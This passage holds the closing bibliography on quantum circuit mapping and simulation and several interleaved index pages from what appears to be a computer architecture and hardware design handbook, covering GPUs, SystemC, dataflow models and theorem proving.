Matsuo A, Hattori W, Yamashita S (2019) Reducing the overhead of mapping quantum circuits to
IBM Q system. In: IEEE International Symposium on Circuits and Systems
Murali P, Baker JM, Javadi-Abhari A, Chong FT, Martonosi M (2019) Noise-adaptive compiler
mappings for Noisy Intermediate-Scale Quantum computers. In: International Conference on
Architectural Support for Programming Languages and Operating Systems
Nam Y, Ross NJ, Su Y, Childs AM, Maslov D (2018) Automated optimization of large quantum
circuits with continuous parameters. npj Quantum Inf, https://doi.org/10.1038/s41534-018-0072-4
Nielsen MA, Chuang IL (2010) Quantum computation and quantum information. Cambridge
University Press, Cambridge
Niemann P, Wille R, Miller DM, Thornton MA, Drechsler R (2016) QMDDs: efficient quantum
function representation and manipulation. IEEE Trans CAD Integr Circuits Systems
Pednault E, Gunnels JA, Nannicini G, Horesh L, Wisnieff R (2019) Leveraging secondary storage
to simulate deep 54-qubit Sycamore circuits. arXiv: 1910.09534
Schwinger J (1960) Unitary operator bases. Proc Natl Acad Sci 46(4):570–579
Seddon JR, Regula B, Pashayan H, Ouyang Y, Campbell ET (2020) Quantifying quantum
speedups: improved classical simulation from tighter magic monotones. arXiv: 2002.06181
Siraichi MY, dos Santos VF, Collange S, Pereira FMQ (2018) Qubit allocation. In: International
Symposium on Code Generation and Optimization
Smith KN, Thornton MA (2019) A quantum computational compiler and design tool for
technology-specific targets. In: International Symposium on Computer Architecture, pp 579–
588
Svore KM et al (2018) Q#: enabling scalable quantum computing and development with a high-
level domain-specific language. In: Proceedings of RWDSL. arXiv:1803.00652
Viamontes GF, Markov IL, Hayes JP (2004) High-performance QuIDD-Based simulation of
quantum circuits. In: Design, Automation and Test in Europe
Vidal G, Dawson CM (2004) Universal quantum circuit for two-qubit transformations with three
controlled-NOT gates. Phys Rev A 69(1):010301
Villalonga B et al (2019) A flexible high-performance simulator for verifying and benchmarking
quantum circuits implemented on real hardware. npj Quantum Inf, https://doi.org/10.1038/s41534-019-0196-1
Vincent T et al (2021) Jet: fast quantum circuit simulations with parallel task-based tensor-network
contraction. arXiv: 2107.09793 [quant-ph]
Watrous J (2018) The theory of quantum information. Cambridge University Press, Cambridge,
590pp
Wille R, Große D, Haedicke F, Drechsler R (2009) SMT-based stimuli generation in the SystemC
Verification library. In: Forum on Specification and Design Languages
Wille R, Burgholzer L, Zulehner A (2019) Mapping quantum circuits to IBM QX architectures
using the minimal number of SWAP and H operations. In: Design Automation Conference
Wille R, Hillmich S, Burgholzer L (2020) JKQ: JKU tools for quantum computing. In: Interna-
tional Conference on CAD
Wille R, Burgholzer L, Artner M (2021) Visualizing decision diagrams for quantum computing.
In: Design, Automation and Test in Europe
Yuan J, Pixley C, Aziz A (2006) Constraint-based verification. Springer
Zulehner A, Wille R (2018) One-pass design of reversible circuits: combining embedding and
synthesis for reversible logic. IEEE Trans CAD Integr Circuits Syst 37(5):996–1008
Zulehner A, Wille R (2019a) Compiling SU(4) quantum circuits to IBM QX architectures. In: Asia
and South Pacific Design Automation Conference, Tokyo, pp 185–190
Zulehner A, Wille R (2019b) Advanced simulation of quantum computations. IEEE Trans CAD
Integr Circuits Syst, https://doi.org/10.1109/TCAD.2018.2834427
Zulehner A, Wille R (2019c) Matrix-Vector vs. Matrix-Matrix multiplication: potential in DD-
based simulation of quantum computations. In: Design, Automation and Test in Europe
Zulehner A, Paler A, Wille R (2019d) An efficient methodology for mapping quantum circuits
to the IBM QX architectures. IEEE Trans CAD Integr Circuits Syst, https://doi.org/10.1109/TCAD.2018.2846658
Zulehner A, Hillmich S, Wille R (2019e) How to efficiently handle complex values? Implementing
decision diagrams for quantum computing. In: International Conference on CAD
Index
C-to-RTL equivalence checking, 1195–1197 Datapath, 846, 847, 856, 863, 1257–1259,
CUBLAS, 410 1299, 1302, 1304, 1306, 1310, 1314
CUDA code, 82, 84, 147, 538 Data rate control, 101
CUDA Pitfall Detector for Real-Time Systems Data store, 611
(CUPiDRT ), 143 Data type customization, 1011, 1164
Cumulative distribution table (CDT) sampler, automatic bitwidth optimization, 1011
250 custom precision floating-point data types,
Current state variables, 1208 1012
Custom architectures, 407 float to fixed-point conversion, 1012
Custom instruction set extension, 846 Data types and operations, 879, 880
Custom instructions, 901 Data vectorization, 1010, 1016–1017
Custom integrated circuits, 407 DDR5, 211, 613, 620
Customized memory hierarchy, 998 Dead-code elimination, 1159
Custom precision floating-point data types, Deadline Monotonic (DM) scheduler, 133
1012 Debug, 952, 1254
CUTE, 1370 Decision tree classification (DTC), 371
Cyber-physical systems (CPS), 130, 707, Decision variables, 917
1028 Decode, 6
Cycle accurate simulation, 908, 923 Decoherence, 728
Cycle-based ISS, 974 Decoupled access-execute (DAE), 494, 1008
Cycle-level simulation Deep learning (DL), 233, 309, 423, 430, 460,
configurability, 906 649, 650, 681
definition, 905 Deep learning accelerator (DLA), 956, 959
metrics and system partitioning, 905 Deep neural network (DNN), 648–650, 652,
open-source simulators, 906 654, 659, 660, 664, 665, 671, 680, 682,
optimisation, 906 753, 797, 1046–1047
performance analysis, 905 ALWANN methodology, 1047–1048
Cycle-specific weakening, 1300, 1301 architecture description, 789
Cycles per instruction (CPI), 36, 927 cross-layer methodology, 1054–1055
Cyclic redundancy check (CRC), 459 energy and performance efficiency, of DNN
Cyclic shift registers, 1008 inference, 1055–1062
Cyclo-static dataflow (CSDF), 1119 energy-efficiency of, 791–793
evaluation and experiments, 1049–1051
speech recognition, 786
D training and classification, 787
Dark silicon, 563, 842 Defaxiom principle, 1327
DART, 1370 Defchoose principle, 1327
Data bounce, 187 Definitional principle, 1327, 1328
Datacenter FPGA, 456 Degree of fault tolerance, 313
Data center network (DCN), 584, 585 Delft Workbench (DWB), 994
Data communication, 573 Delite hardware definition language (DHDL),
Data dependencies, 895 996
Data Encryption Standard (DES), 238 Demand bound function, 134
Data-flow analysis, 1156 Dennard scaling, 596
Dataflow engines (DFEs), 994 Dennard’s Power Scaling, 51
Data-flow execution model, 1091 Denormal numbers, 391
Data flow graph (DFG), 36, 473, 476, 479, Dense linear algebra (DLA), 403
486, 488, 492, 1154, 1250 Design exercise, 1257–1259
Dataflow process network (DPN), 1121 Design rule checking (DRC), 754
Dataflow processor (DPU), 369 Design space exploration (DSE), 302, 350,
Data forwarding, 571 367, 568, 586, 850, 866, 867, 916–919,
Data hazards, 18–25 940, 941
Data-level parallelism, 536, 1163 analytical fitness evaluation, 926–927
Data parallelism, 1071, 1080 application exploration, 937–940
Graphical user interface (GUI), 820 Handling sparsity, in IoT devices, 101
Graphics, 885 compressed sparse formats, 103–104
Graphics cards of machine learning inner product approach, hardware
accelerators, 82 architecture for, 105–108
Graphics processing unit (GPU), 132, 137, matrix multiplication, approaches in,
138, 145, 146, 202, 233, 323, 408, 419, 102–103
532, 599, 636, 887, 990, 1085 outer product approach, hardware
accelerated DNN computations, 789 architecture for, 108–110
access-aware variable mapping to memory, Hard disk drive (HDD), 300
547–549 Hardened network transceivers, 423
advanced warp schedulers, hiding memory Hardware, 568, 569
access latency with, 550–551 Hardware accelerators, 1037–1038
arithmetic format support, 408 DNNs, 1046–1051
caches, 409 image and video processing applications,
constant memory, 546 1038–1046
energy efficiency, 552–555 Hardware and software architectures, for video
execution model, 536–538 coding, 224–226
global memory, 545 complexity reduction, 227
GPU for general purpose computing, DTM for HEVC, 229–232
536–549 low-power memory architectures, 227–229
graphics pipeline, 533–535 workload balancing, for multiple video
hardware architecture, 138–140, 540–545 tiles, 229
initial GPUs, 408 Hardware and software (HW/SW), 1380–1385
L1 and L2 caches, 547 partitioning, 958
performance, 550–552 performance optimization and validation,
programming interface, 538–540 959–960
register file, 409, 542 Hardware aspects, 896, 897
reliability, 555–557 Hardware-based emulation, 953
shader pipeline, 540–542 Hardware complexity, 50
shared memory, 546–547 Hardware debugging, 410
simplified architecture of traditional GPU Hardware description language (HDL), 843,
architecture, 534 850, 949, 953
SIMT stack, 544–545 Hardware emulation, 907, 908
single GPU, scheduling tasks on, 140–143 Hardware IFT, 1390
stream processing, 409 Hardware implementations
texture memory, 546 adders, 396–397
threading model, 139–140 dividers, 398
throttling memory access latency, 551–552 multipliers, 397–398
vectorization, 408 square root, 398
warp scheduler, 543–544 Hardware in the loop (HiL), 961
Graph isomorphism, 484 Hardware Performance Counters (HPCs), 194
Graph minor based technique, 489 Hardware reprogrammability, 423
Graph subdivision, 485 Hardware security
Gray code, 388–389 and data protection, 868
Greedy-Then-Oldest (GTO), 544 verification, 1390
Ground zero theory, 1327 Hardware/software integration, 867
Grover’s algorithm, 239, 734 Hardware vulnerabilities, 1390
G-share, 33 Harmonic mean (HM), 634
Gustafson’s Law, 52, 603 Harvard architecture, 5
HeteroCL, 1017–1019
Heterogeneous architecture, 842, 864
H Heterogeneous CPU cores, 637–638
Halide-HLS, 995, 1010 Heterogeneous image processing acceleration
Hamming distance, 1036 (Hipacc), 995
Synchronization, 129 T
Synchronous dataflow (SDF), 497–498, 1116, Tag store, 611
1119 Target-address, 7
Synchronous Parameterized and Interfaced Target binary program (TBP), 1372
Dataflow Embedded Runtime Target technology, 844–846
(SPIDER), 1139 Task granularity, 1091
Synopsys ARC cores, 909 Tasking model, 1077–1079
Synthesis, 418 Task instance, 131
System as a service (SAS), 86 Task-level parallelism, 1164
Systematic methodology for Automatic Logic Task mapping strategies, 573
Synthesis of Approximate circuits Task migration, 571
(SALSA), 1032–1033 Task parallelism, 1071
SystemC, 950–952, 967 Task scheduling, 571
SystemC 1.0, 951–952 Technology agnostic work
SystemC 2.0, 952 measurement error mitigation, 744
SystemC Modeling Library (SCML), 971, 976, noise-aware qubit mapping, 743–744
977 Technology-level laws, 51
SystemC Transaction Level Modeling Technology scaling, 278, 842
Standard, 967–969 Temperature, 223, 224, 231, 234
approximately timed modeling style, Temporal decoupling, 969
970–971 Temporal redundancy, 293
extended AT, 971 Temporal ROI-based coding, 97
extended loosely timed modeling style, 970 TEMU, 1370
loosely timed modeling style, 969 Tensilica TIE, 819–820, 831
System-level design, 916, 1247 Tensor processing unit (TPU), 471, 809
System-level power analysis, 958, 965–966 TensorFlow, 995
System-level power delivery network analysis TensorFlow-32 (TF32), 396
analysis methods, 777 Ternary Content-Addressable Memory
dynamic rail analysis, 781 (TCAM), 523
frequency- and time-domain analysis, Test selection phase, 1373
782–785 Texture memory, 546
static rail analysis, 778 Theorem prover, 1197
system-level power delivery network Theorem proving
modeling, 775 ACL2 preliminaries, 1324–1332
System matrix, 1422, 1423 analog systems, 1358
System-memory interfaces, 815 analysis of microarchitecture properties,
System of difference constraints (SDC), 856, 1338–1345
1001 concurrent protocols, 1358
System-on-chip (SoC), 139, 202–203, 211, formalization and analysis of (simplified)
469, 635–636, 1193, 1201, 1239, x86, 1345–1358
1380–1385 ISA, 1332–1337
accelerators, 208–209 and microprocessor assurance, 1322–1324
architecture optimization, 960 software verification, 1358
balanced processor architectures, 205 Thermal design point/thermal design
CPU memory parallelism, 206–208 power (TDP), 570, 576, 577,
CPU types, 204–205 605, 609
design and verification, 949–950 Thermal management, 574–577
processor, 203–208 Thinker series, 360–361
System under test (SUT), 1367 Thread-level parallelism (TLP), 469, 562,
Systolic array(s), 1004 601–604, 606, 628
architecture, 862, 866 Thread of control, 1164
Systolic mapping, 495 3D microarchitecture, 568